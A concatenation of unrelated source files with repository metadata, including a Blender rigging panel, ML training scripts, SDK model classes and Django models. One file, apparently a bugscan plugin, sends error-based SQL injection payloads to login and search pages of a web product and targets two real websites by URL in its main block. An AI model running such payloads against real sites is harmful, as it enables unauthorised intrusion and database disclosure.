class _ListOp(bpy.types.Operator):
bl_idname = 'io_scene_xray.list'
bl_label = ''
operation = bpy.props.StringProperty()
collection = bpy.props.StringProperty()
index = bpy.props.StringProperty()
def execute(self, context):
data = getattr(context, _ListOp.bl_idname + '.data')
collection = getattr(data, self.collection)
index = getattr(data, self.index)
if self.operation == 'add':
collection.add().name = ''
elif self.operation == 'remove':
collection.remove(index)
if index > 0:
setattr(data, self.index, index - 1)
elif self.operation == 'move_up':
collection.move(index, index - 1)
setattr(data, self.index, index - 1)
elif self.operation == 'move_down':
collection.move(index, index + 1)
setattr(data, self.index, index + 1)
return {'FINISHED'}
def draw_list_ops(layout, dataptr, propname, active_propname):
def operator(operation, icon, enabled=None):
lay = layout
if (enabled is not None) and (not enabled):
lay = lay.split(align=True)
lay.enabled = False
operator = lay.operator(_ListOp.bl_idname, icon=icon)
operator.operation = operation
operator.collection = propname
operator.index = active_propname
layout.context_pointer_set(_ListOp.bl_idname + '.data', dataptr)
operator('add', 'ZOOMIN')
collection = getattr(dataptr, propname)
index = getattr(dataptr, active_propname)
operator('remove', 'ZOOMOUT', enabled=(index >= 0) and (index < len(collection)))
operator('move_up', 'TRIA_UP', enabled=(index > 0) and (index < len(collection)))
operator('move_down', 'TRIA_DOWN', enabled=(index >= 0) and (index < len(collection) - 1))
class BoneList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
obj = context.object
stk_data = obj.data.stalker_rig_helper
if stk_data.bone_collection_index == index:
icon = 'CHECKBOX_HLT'
else:
icon = 'CHECKBOX_DEHLT'
bone = stk_data.bone_collection[index]
row = layout.row()
row.label(text='', icon=icon)
row.prop_search(bone, 'hand_bone', obj.data, 'bones', text='')
wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
row.prop_search(bone, 'wpn_bone', wpn_obj.data, 'bones', text='')
row.prop_search(bone, 'offset_bone', obj.data, 'bones', text='')
class STALKER_HUD_Rig_Helper_Panel(bpy.types.Panel):
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "data"
bl_options = {'DEFAULT_CLOSED'}
bl_label = 'STALKER HUD Rig Helper'
@classmethod
def poll(cls, context):
if not context.object:
return False
return context.object.type == 'ARMATURE'
def draw(self, context):
obj = context.object
stk_data = obj.data.stalker_rig_helper
lay = self.layout
row = lay.row()
wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
if not wpn_obj:
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
return
if wpn_obj.type != 'ARMATURE':
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
return
if wpn_obj.name == obj.name:
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
return
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
row = lay.row()
row.label('Hand Bones')
row.label(icon='FORWARD')
row.label('Weapon Bones')
row.label(icon='FORWARD')
row.label('Offset Bones')
row = lay.row()
col = row.column()
col.template_list(
'BoneList', 'name',
stk_data, 'bone_collection',
stk_data, 'bone_collection_index'
)
col = row.column(align=True)
draw_list_ops(
col, stk_data,
'bone_collection', 'bone_collection_index',
)
lay.operator('stalker_rig_helper.tie_weapon')
def register():
bpy.utils.register_class(_ListOp)
bpy.utils.register_class(BoneList)
bpy.utils.register_class(STALKER_HUD_Rig_Helper_Panel)
def unregister():
bpy.utils.unregister_class(STALKER_HUD_Rig_Helper_Panel)
bpy.utils.unregister_class(BoneList)
bpy.utils.unregister_class(_ListOp)
| [
"stalkermodkytia@yandex.ru"
] | stalkermodkytia@yandex.ru |
3bb521fa84719f1797e0bb0b6e9dc5230ea3ed5a | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/11c6ffa2-1596.py | 634f6b84e257b4ab196fc2c9b9eed72c5fc1cb73 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-070091
#refer:http://www.wooyun.org/bugs/wooyun-2010-077673
#refer:http://www.wooyun.org/bugs/wooyun-2010-082926
def assign(service, arg):
if service == "jienuohan":
return True, arg
def audit(arg):
payloads = [
'Web/Login.aspx',
'web/KeySearch.aspx?searchid=1',
'KeySearch.aspx',
'KeySearch.aspx',
'KeySearch.aspx',
'liuyan.aspx',
'liuyan.aspx',
'liuyan.aspx',
]
postdatas = [
'username=1%27%20and%20db_name%281%29%3E1--',
'operat=Search&state=&keyword=1%25%27%20and%20db_name%281%29%3E1--',
'title=1%27%20AND%20db_name%281%29%3E1--',
'author=1%27%20AND%20db_name%281%29%3E1--',
'keyword=1%27%20AND%20db_name%281%29%3E1--',
'LinkTel=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
'Mail=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
'username=1%27%2b%20%28select%20convert%28int%2C%28@@version%29%29%20FROM%20syscolumns%29%20%2b%27'
]
for i in range(8):
url = arg + payloads[i]
code, head, res, errcode, _ = curl.curl2(url,postdatas[i])
if 'master' in res :
security_hole(arg+payloads[i])
if __name__ == '__main__':
from dummy import *
audit(assign('jienuohan','http://www.cnemergency.com/')[1])
audit(assign('jienuohan','http://ctc.hlglzz.com/')[1])
| [
"yudekui@wsmtec.com"
] | yudekui@wsmtec.com |
bf5ff7b4246763917fcc89424e632f404a4f5308 | af41c215f420bbd66067d6dc851ce41d9ed40819 | /GBRBM/test_mini_movie.py | ad0397fa82fa6eb437eb6ead354ff9ac8e500f35 | [] | no_license | danathughes/pyNeuralNetwork | b704f525bddbc64eabf33c1174dad0649be7bfd9 | dbe2090e50434f33ac7a46845ad67eb5dc7dea87 | refs/heads/master | 2021-01-01T16:30:47.781646 | 2016-01-27T23:11:51 | 2016-01-27T23:11:51 | 19,729,930 | 0 | 4 | null | 2015-02-27T22:22:18 | 2014-05-13T07:32:24 | Python | UTF-8 | Python | false | false | 987 | py | from RBM import *
def get_RBM():
r = RBM(6,2)
k = 9
dataset = [[0.9,0.8,0.9,0.1,0.2,0.2],
[0.9,0.4,0.8,0.2,0.1,0.2],
[0.8,1.0,0.9,0.0,0.1,0.0],
[0.1,0.1,0.9,0.8,1.0,0.2],
[0.2,0.1,0.9,0.9,0.9,0.1],
[0.1,0.2,1.0,0.9,0.8,0.1]]
# Train at the following learning rates:
print "Training..."
learning_rates = [0.1, 0.05, 0.01, 0.005, 0.001, 0.0005, 0.0001]
# learning_rates = [0.1]
for rate in learning_rates:
print "Learning rate =", rate
for i in range(100):
print ' ' + str(i) + '...',
r.train_epoch(dataset, rate, k)
err = np.sum([r.free_energy(data) for data in dataset])
print 'Energy = ' + str(err) + '...',
PL = r.pseudolikelihood(dataset)
print 'Pseudolikelihood = ' + str(PL) + '...',
L = r.likelihood(dataset)
print 'Likelihood = ' + str(L) + '...',
print 'Done'
return r, dataset
| [
"danathughes@gmail.com"
] | danathughes@gmail.com |
276efaa89b7025eb62f18860f10c254de3df0147 | 26edf9a7a579782e72753c82082047ebe23a5080 | /catalyst/contrib/models/cv/segmentation/blocks/fpn.py | 2c3106814fe5f3f1db7a7f92fde028fe271e8148 | [
"Apache-2.0"
] | permissive | 418sec/catalyst | e8578c3561d54053bf53cb065d5ab516a2c505e9 | 8ce39fc31635eabc348b055a2df8ec8bc5700dce | refs/heads/master | 2023-02-17T22:18:57.257809 | 2021-01-21T09:27:46 | 2021-01-21T09:27:46 | 327,367,304 | 0 | 1 | Apache-2.0 | 2021-01-21T09:27:47 | 2021-01-06T16:24:31 | null | UTF-8 | Python | false | false | 3,708 | py | # flake8: noqa
# @TODO: code formatting issue for 20.07 release
import torch
from torch import nn
from torch.nn import functional as F
from catalyst.contrib.models.cv.segmentation.blocks.core import DecoderBlock
class DecoderFPNBlock(DecoderBlock):
"""@TODO: Docs (add description, `Example`). Contribution is welcome."""
def __init__(
self,
in_channels: int,
enc_channels: int,
out_channels: int,
in_strides: int = None,
upsample_scale: int = 2,
interpolation_mode: str = "nearest",
align_corners: bool = None,
aggregate_first: bool = False,
**kwargs
):
"""
Args:
@TODO: Docs. Contribution is welcome.
"""
self.upsample_scale = upsample_scale
self.interpolation_mode = interpolation_mode
self.align_corners = align_corners
super().__init__(
in_channels, enc_channels, out_channels, in_strides, **kwargs
)
def _get_block(self):
block = nn.Conv2d(self.enc_channels, self.out_channels, kernel_size=1)
return block
def forward(
self, bottom: torch.Tensor, left: torch.Tensor
) -> torch.Tensor:
"""Forward call."""
x = F.interpolate(
bottom,
scale_factor=self.upsample_scale,
mode=self.interpolation_mode,
align_corners=self.align_corners,
)
left = self.block(left)
x = x + left
return x
class Conv3x3GNReLU(nn.Module):
"""@TODO: Docs (add description, `Example`). Contribution is welcome."""
def __init__(
self,
in_channels,
out_channels,
upsample=False,
upsample_scale: int = 2,
interpolation_mode: str = "bilinear",
align_corners: bool = True,
):
"""
Args:
@TODO: Docs. Contribution is welcome.
"""
super().__init__()
self.upsample = upsample
self.upsample_scale = upsample_scale
self.interpolation_mode = interpolation_mode
self.align_corners = align_corners
self.block = nn.Sequential(
nn.Conv2d(
in_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False,
),
nn.GroupNorm(32, out_channels),
nn.ReLU(inplace=True),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Forward call."""
x = self.block(x)
if self.upsample:
x = F.interpolate(
x,
scale_factor=self.upsample_scale,
mode=self.interpolation_mode,
align_corners=self.align_corners,
)
return x
class SegmentationBlock(nn.Module):
"""@TODO: Docs (add description, `Example`). Contribution is welcome."""
def __init__(
self, in_channels: int, out_channels: int, num_upsamples: int = 0
):
"""@TODO: Docs. Contribution is welcome."""
super().__init__()
blocks = [
Conv3x3GNReLU(
in_channels, out_channels, upsample=bool(num_upsamples)
)
]
if num_upsamples > 1:
for _ in range(1, num_upsamples): # noqa: WPS122
blocks.append(
Conv3x3GNReLU(out_channels, out_channels, upsample=True)
)
self.block = nn.Sequential(*blocks)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Forward call."""
return self.block(x)
__all__ = ["DecoderFPNBlock", "Conv3x3GNReLU", "SegmentationBlock"]
| [
"noreply@github.com"
] | 418sec.noreply@github.com |
a5675c5781886c2efa317d61bb02a5aa1e60eabe | 3be8b5d0334de1f3521dd5dfd8a58704fb8347f9 | /dependencies/mongo/example/nested_reference.py | a69614dea4ae0d495a5995665ac30ce01e296563 | [
"MIT"
] | permissive | bmillham/djrq2 | 21a8cbc3087d7ad46087cd816892883cd276db7d | 5f357b3951600a9aecbe6c50727891b1485df210 | refs/heads/master | 2023-07-07T01:07:35.093669 | 2023-06-26T05:21:33 | 2023-06-26T05:21:33 | 72,969,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # encoding: utf-8
from marrow.mongo.document import Document
from marrow.mongo.field import ObjectId, String, Embed
class Sample(Document):
class Nested(Document):
name = String()
reference = ObjectId()
id = ObjectId('_id')
nested = Embed(Nested, default=lambda: Nested(), assign=True)
from pprint import pprint
pprint(Sample.id == None)
pprint(Sample.nested.name == "Alice")
| [
"bmillham@gmail.com"
] | bmillham@gmail.com |
41cc6093c3c0a68f6f0a994159f9a2551570180c | 5a281cb78335e06c631181720546f6876005d4e5 | /karbor-1.3.0/karbor/services/operationengine/engine/triggers/timetrigger/timeformats/crontab_time.py | e11467c8c185fbb93e1b6e2cce38bebbd4bd4c07 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 1,856 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from croniter import croniter
from datetime import datetime
from oslo_utils import timeutils
from karbor import exception
from karbor.i18n import _
from karbor.services.operationengine.engine.triggers.timetrigger import \
timeformats
class Crontab(timeformats.TimeFormat):
def __init__(self, start_time, pattern):
self._start_time = start_time
self._pattern = pattern
super(Crontab, self).__init__(start_time, pattern)
@classmethod
def check_time_format(cls, pattern):
if not pattern:
msg = (_("The trigger pattern is None"))
raise exception.InvalidInput(msg)
try:
croniter(pattern)
except Exception:
msg = (_("The trigger pattern(%s) is invalid") % pattern)
raise exception.InvalidInput(msg)
def compute_next_time(self, current_time):
time = current_time if current_time >= self._start_time else (
self._start_time)
return croniter(self._pattern, time).get_next(datetime)
def get_min_interval(self):
try:
t1 = self.compute_next_time(datetime.now())
t2 = self.compute_next_time(t1)
return timeutils.delta_seconds(t1, t2)
except Exception:
return None
| [
"Wayne Gong@minbgong-winvm.cisco.com"
] | Wayne Gong@minbgong-winvm.cisco.com |
f89a2a68338f83f4a881cb9afc97f86862752b31 | 0a08829b3327ecf180c72c03d0ba76d5ce118ae6 | /src/traffic_sign_classifier/model.py | da8623a2702b2c8fe677c5160aeab1dc25f0a117 | [] | no_license | ajunlonglive/self-driving-vehicle | 3ce2b83a642a7fc148288e12da9689592078a678 | a66746dea5448dcb175ab85a0a46ef60a09d185e | refs/heads/master | 2023-05-14T05:46:01.490492 | 2020-05-26T06:03:30 | 2020-05-26T06:03:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,388 | py | import numpy as np
import tensorflow as tf
from tensorflow.keras import layers
def dataset_pipeline(images, labels, input_fn, params, mode="train"):
num_classes = tf.constant(
np.repeat(params["num_classes"], len(images)).astype(np.int32), dtype=tf.int32
)
tf.assert_equal(tf.shape(images)[0], tf.shape(labels)[0], tf.shape(num_classes)[0])
shuffle_buffer_size = np.int32(images.shape[0])
with tf.name_scope("input_pipeline"):
data_pipeline = tf.data.Dataset.from_tensor_slices((images, labels, num_classes))
# We should map the data set first before making batches
data_pipeline = data_pipeline.map(input_fn, num_parallel_calls=2)
if mode == "train":
data_pipeline = data_pipeline.repeat(params["epochs"]) \
.shuffle(buffer_size=shuffle_buffer_size, reshuffle_each_iteration=True) \
.batch(params["batch_size"])
else:
data_pipeline = data_pipeline.batch(params["batch_size"])
return data_pipeline
class LeNet(tf.Module):
def __init__(self, num_classes):
self.conv1 = layers.Conv2D(filters=6, kernel_size=(5, 5), strides=1, activation="relu")
self.bn1 = layers.BatchNormalization()
self.pool1 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
self.conv2 = layers.Conv2D(filters=16, kernel_size=(5, 5), strides=1, activation="relu")
self.bn2 = layers.BatchNormalization()
self.pool2 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
self.flatten = layers.Flatten()
self.dense = layers.Dense(120, activation="relu")
self.dense2 = layers.Dense(84, activation="relu")
self.logits = layers.Dense(num_classes)
def __call__(self, features):
out = self.conv1(features)
# out = self.bn1(out)
# print('out.shape: ', out.shape)
out = self.pool1(out)
# print('out.shape: ', out.shape)
out = self.conv2(out)
# out = self.bn2(out)
# print('out.shape: ', out.shape)
out = self.pool2(out)
# print('out.shape: ', out.shape)
out = self.flatten(out)
# print('out.shape: ', out.shape)
out = self.dense(out)
# print('out.shape: ', out.shape)
out = self.logits(out)
# print("logits: ", out.shape)
return out
| [
"sardhendumishra@gmail.com"
] | sardhendumishra@gmail.com |
bed7c0f2544d7469900ac7b0c9d6a9378ac8d8be | b26772a7ac736f5454815567817feda20d690363 | /source/lists/migrations/0005_translationslist_language.py | 0dec92a3e658e3b07c63c711cf39fead34de7222 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | mverleg/WW | 3f49e4be411a6203951fccf6f967f8164b988d09 | b58a9bbfc91d19541840f490ed59997d85389c0a | refs/heads/master | 2021-01-10T06:53:22.004564 | 2015-09-23T21:28:13 | 2015-09-23T21:28:13 | 54,189,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('lists', '0004_more_help_text'),
]
operations = [
migrations.AddField(
model_name='translationslist',
name='language',
field=models.CharField(blank=True, max_length=8, null=True, help_text=b'You can select the language to learn for this list, or leave it blank for a mixed-language list.', choices=[(b'en-gb', 'English (British)'), (b'zh-cn', 'Chinese (simplified Mandarin)'), (b'de', 'German'), (b'nl', 'Dutch')]),
preserve_default=True,
),
]
| [
"mark@rafiki"
] | mark@rafiki |
4113f46b5b98d26a87750e2dfe93b09c474d84ff | 8fbd17c39db677b91442f6e26d7e760d8296c064 | /chapter_11/fmnist_momentum.py | 9e6f464027c6e5af29db09ee0772ea3f11d7c188 | [
"MIT"
] | permissive | a1ip/MathForDeepLearning | 869172a36292a77195d28ffee23281e25a0440e3 | 8db1a85ce3cef4b48aab01ebe156e3fab2dfa271 | refs/heads/main | 2023-09-02T13:17:54.098315 | 2021-10-24T13:40:26 | 2021-10-24T13:40:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | #
# file: fmnist_momentum.py
#
# Train and test the small 14x14 FMNIST dataset.
#
# RTK, 03-Feb-2021
# Last update: 19-Feb-2021
#
################################################################
from sklearn.metrics import matthews_corrcoef
import numpy as np
from NNm import *
# Load, reshape, and scale the data
x_train = np.load("../dataset/fmnist_train_images_small.npy")/255
x_test = np.load("../dataset/fmnist_test_images_small.npy")/255
y_train = np.load("../dataset/fmnist_train_labels_vector.npy")
y_test = np.load("../dataset/fmnist_test_labels.npy")
x_train = x_train.reshape(x_train.shape[0], 1, 14*14)
x_test = x_test.reshape(x_test.shape[0], 1, 14*14)
# Build the network using sigmoid activations
net = Network(verbose=True)
net.add(FullyConnectedLayer(14*14, 100, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(100, 50, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(50, 10, momentum=0.9))
net.add(ActivationLayer())
# Loss and train
net.fit(x_train, y_train, minibatches=40000, learning_rate=0.2)
# Build the confusion matrix using the test set predictions
out = net.predict(x_test)
pred = np.array(out)[:,0,:]
cm = np.zeros((10,10), dtype="uint32")
for i in range(len(y_test)):
cm[y_test[i],np.argmax(out[i])] += 1
# Show the results
print()
print(np.array2string(cm))
print()
print("accuracy = %0.7f" % (np.diag(cm).sum() / cm.sum(),))
print("MCC = %0.7f" % matthews_corrcoef(y_test, np.argmax(pred, axis=1)))
print()
| [
"oneelkruns@hotmail.com"
] | oneelkruns@hotmail.com |
cb9a8d46b6e83034c5f9c0d66e55bdebe20adcc4 | d191a04a3ded41175ea84ae88ebddb4f262b7fb1 | /Dynamic_program/47_dice_roll_simulation.py | 21a976620079f907ec469158fee53ad284a8bf02 | [] | no_license | YLyeliang/now_leet_code_practice | ae4aea945bae72ec08b11e57a8f8a3e81e704a54 | 204d770e095aec43800a9771fe88dd553463d2f7 | refs/heads/master | 2022-06-13T20:22:51.266813 | 2022-05-24T05:29:32 | 2022-05-24T05:29:32 | 205,753,056 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,641 | py | # A die simulator generates a random number from 1 to 6 for each roll. You introduced a constraint to the generator
# such that it cannot roll the number i more than rollMax[i] (1-indexed) consecutive times.
#
# Given an array of integers rollMax and an integer n, return the number of distinct sequences that can be obtained
# with exact n rolls.
#
# Two sequences are considered different if at least one element differs from each other. Since the answer may be too
# large, return it modulo 10^9 + 7.
#
#
#
# Example 1:
#
# Input: n = 2, rollMax = [1,1,2,2,2,3]
# Output: 34
# Explanation: There will be 2 rolls of die, if there are no
# constraints on the die, there are 6 * 6 = 36 possible combinations. In this case, looking at rollMax array,
# the numbers 1 and 2 appear at most once consecutively, therefore sequences (1,1) and (2,2) cannot occur,
# so the final answer is 36-2 = 34.
# Example 2:
#
# Input: n = 2, rollMax = [1,1,1,1,1,1]
# Output: 30
# Example 3:
#
# Input: n = 3, rollMax = [1,1,1,2,2,3]
# Output: 181
#
# Constraints:
#
# 1 <= n <= 5000
# rollMax.length == 6
# 1 <= rollMax[i] <= 15
# 问题:有一个骰子模拟器会每次投掷的时候生成一个 1 到 6 的随机数。
# 不过我们在使用它时有个约束,就是使得投掷骰子时,连续掷出数字i的次数不能超过 rollMax[i](i 从 1 开始编号)。
# 给定rollMax和n,返回用n次投掷得到的不同点数序列的数目;
# 假如两个序列中至少存在一个元素不同,就认为这两个序列是不同的。
# 分析:以n=3为例,扔第一次时,i=1,6种情况.假设dp[i][j]为扔i次时以j结尾时的情况
# i=2, 由于rollMax[0,1,2]为1,则不能出现11,22,33的情况,而对于以1结尾的情况为y1,y为非1的数,共5种情况。 对于以4结尾的,则有x4,共6种。
# 则可以得到dp[2][1,2,3]=5, dp[2][4,5,6]=6, dp[2][7] = sum(dp[2]) = 33
# i=3,对于以1结尾的,则有xy1,x为1-6,y为非1数。考虑到dp[2]有33种分布,而在i=2时,以1结尾的情况dp[2][1]有5种,则dp[3][1]=dp[2]-dp[2][1]
# dp[3][1] = dp[3-1] - dp[3-1][1]
# 以另一个例子, i=5, rollMax[5] = 3,以5结尾的情况有如下几种:
# xxxy5
# xxy55
# xy555
# 这几种情况分别对应 而dp[4]的所有情况包含了上述三种情况,现在只要减去不满足上面的情况即可。dp[5][5] = dp[4] - dp[4][5] +dp[3] - dp[3][5] + ...
# 其中dp[4]包含了xxxx的情况,dp[4] - dp[4][5]即 减去xxx5,也就是xxx55的情况,
from typing import List
class Solution:
def dieSimulator(self, n: int, rollMax: List[int]) -> int:
faces = len(rollMax)
# [n + 1][faces + 1] dimensional dp array
dp = [[0 for i in range(faces + 1)] for j in range(n + 1)]
# initialization
# roll 0 times, the total combination is 1
dp[0][faces] = 1
# roll 1 times, the combinations that end at face j is 1
for j in range(faces):
dp[1][j] = 1
# roll 1 times, the total combination is faces = 6
dp[1][faces] = faces
# then roll dices from 2 times, until n times
for i in range(2, n + 1):
# iterate through each column (face)
for j in range(faces):
# at each [i, j], trying to go up (decrease i) and collect all the sum of previous state
for k in range(1, rollMax[j] + 1):
if i - k < 0:
break
dp[i][j] += dp[i - k][faces] - dp[i - k][j]
# update total sum of this row
dp[i][faces] = sum(dp[i])
return dp[n][faces] % 1000000007
| [
"k87974@163.com"
] | k87974@163.com |
4c9a02b5409c94b1bb4ea0e3c04bac9a3ea27a01 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-gsl/huaweicloudsdkgsl/v3/model/show_real_named_response.py | a878e053144f5e24e1385f5992007dfc2351944c | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,870 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowRealNamedResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'iccid': 'str',
'real_named': 'bool'
}
attribute_map = {
'iccid': 'iccid',
'real_named': 'real_named'
}
def __init__(self, iccid=None, real_named=None):
"""ShowRealNamedResponse - a model defined in huaweicloud sdk"""
super(ShowRealNamedResponse, self).__init__()
self._iccid = None
self._real_named = None
self.discriminator = None
if iccid is not None:
self.iccid = iccid
if real_named is not None:
self.real_named = real_named
@property
def iccid(self):
"""Gets the iccid of this ShowRealNamedResponse.
ICCID
:return: The iccid of this ShowRealNamedResponse.
:rtype: str
"""
return self._iccid
@iccid.setter
def iccid(self, iccid):
"""Sets the iccid of this ShowRealNamedResponse.
ICCID
:param iccid: The iccid of this ShowRealNamedResponse.
:type: str
"""
self._iccid = iccid
@property
def real_named(self):
"""Gets the real_named of this ShowRealNamedResponse.
是否已实名认证: true表示是,false表示否。
:return: The real_named of this ShowRealNamedResponse.
:rtype: bool
"""
return self._real_named
@real_named.setter
def real_named(self, real_named):
"""Sets the real_named of this ShowRealNamedResponse.
是否已实名认证: true表示是,false表示否。
:param real_named: The real_named of this ShowRealNamedResponse.
:type: bool
"""
self._real_named = real_named
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowRealNamedResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
e0fd8a8d176a8e39489490cca6af92f2274b1118 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_285/ch34_2019_06_03_00_25_27_762087.py | f2819fd0219c42be675bd7d5afd0366d356bc55b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | deposito= float(input("depósito inicial: "))
taxa= float(input("taxa de juros: "))
total=0
mes=1
contador=0
while contador<=24:
mes+=deposito*(1+taxa)
deposito=mes
print(mes, '.2f')
contador+=1
total+=deposito*taxa
print(total, '.2f') | [
"you@example.com"
] | you@example.com |
7216333c302abb5b4fec775da03c1c66a1cae875 | e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d | /a10sdk/core/rate/rate_limit.py | 929ad6636bdb4d3038f3d89fee75dae645facb41 | [
"Apache-2.0"
] | permissive | amwelch/a10sdk-python | 4179565afdc76cdec3601c2715a79479b3225aef | 3e6d88c65bd1a2bf63917d14be58d782e06814e6 | refs/heads/master | 2021-01-20T23:17:07.270210 | 2015-08-13T17:53:23 | 2015-08-13T17:53:23 | 40,673,499 | 0 | 0 | null | 2015-08-13T17:51:35 | 2015-08-13T17:51:34 | null | UTF-8 | Python | false | false | 1,402 | py | from a10sdk.common.A10BaseClass import A10BaseClass
class RateLimit(A10BaseClass):
""" :param maxPktNum: {"description": "Max number of packets", "format": "number", "default": 10000, "optional": true, "maximum": 100000, "minimum": 1000, "type": "number"}
:param rl_type: {"optional": true, "enum": ["ctrl"], "type": "string", "description": "'ctrl': The max number of packets that can be sent to kernel in 100ms; ", "format": "enum"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
Rate limit configuration.
Class rate-limit supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/rate-limit`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "rate-limit"
self.a10_url="/axapi/v3/rate-limit"
self.DeviceProxy = ""
self.maxPktNum = ""
self.rl_type = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| [
"doug@parksidesoftware.com"
] | doug@parksidesoftware.com |
824b24517c09d539722766485dba21e97ce02513 | c2a03f1cdc338c9078534d8eb2213b214a251e73 | /Pollapp/models.py | 1f700be8d88cd216b815efd7141c4ea87d9d0ca1 | [] | no_license | risification/onlinde_test | 9a2db6a945734cc74ee8bc8408ac0ce39fa9d3b3 | 3e1e7e5aca4fa59db08f6394c85ce00652c0871b | refs/heads/master | 2023-03-14T08:24:53.574738 | 2021-03-05T17:22:08 | 2021-03-05T17:22:08 | 344,850,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | from django.db import models
from datetime import date
# Create your models here.
class Poll(models.Model):
name = models.CharField(max_length=30)
date = models.DateField(auto_now_add=True)
points = models.IntegerField(default=0)
class Question(models.Model):
poll = models.ForeignKey(Poll, on_delete=models.CASCADE)
title = models.CharField(max_length=50)
true_answer = models.CharField(max_length=30)
class ChoiceAnsw(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice = models.CharField(max_length=40)
class Answer(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
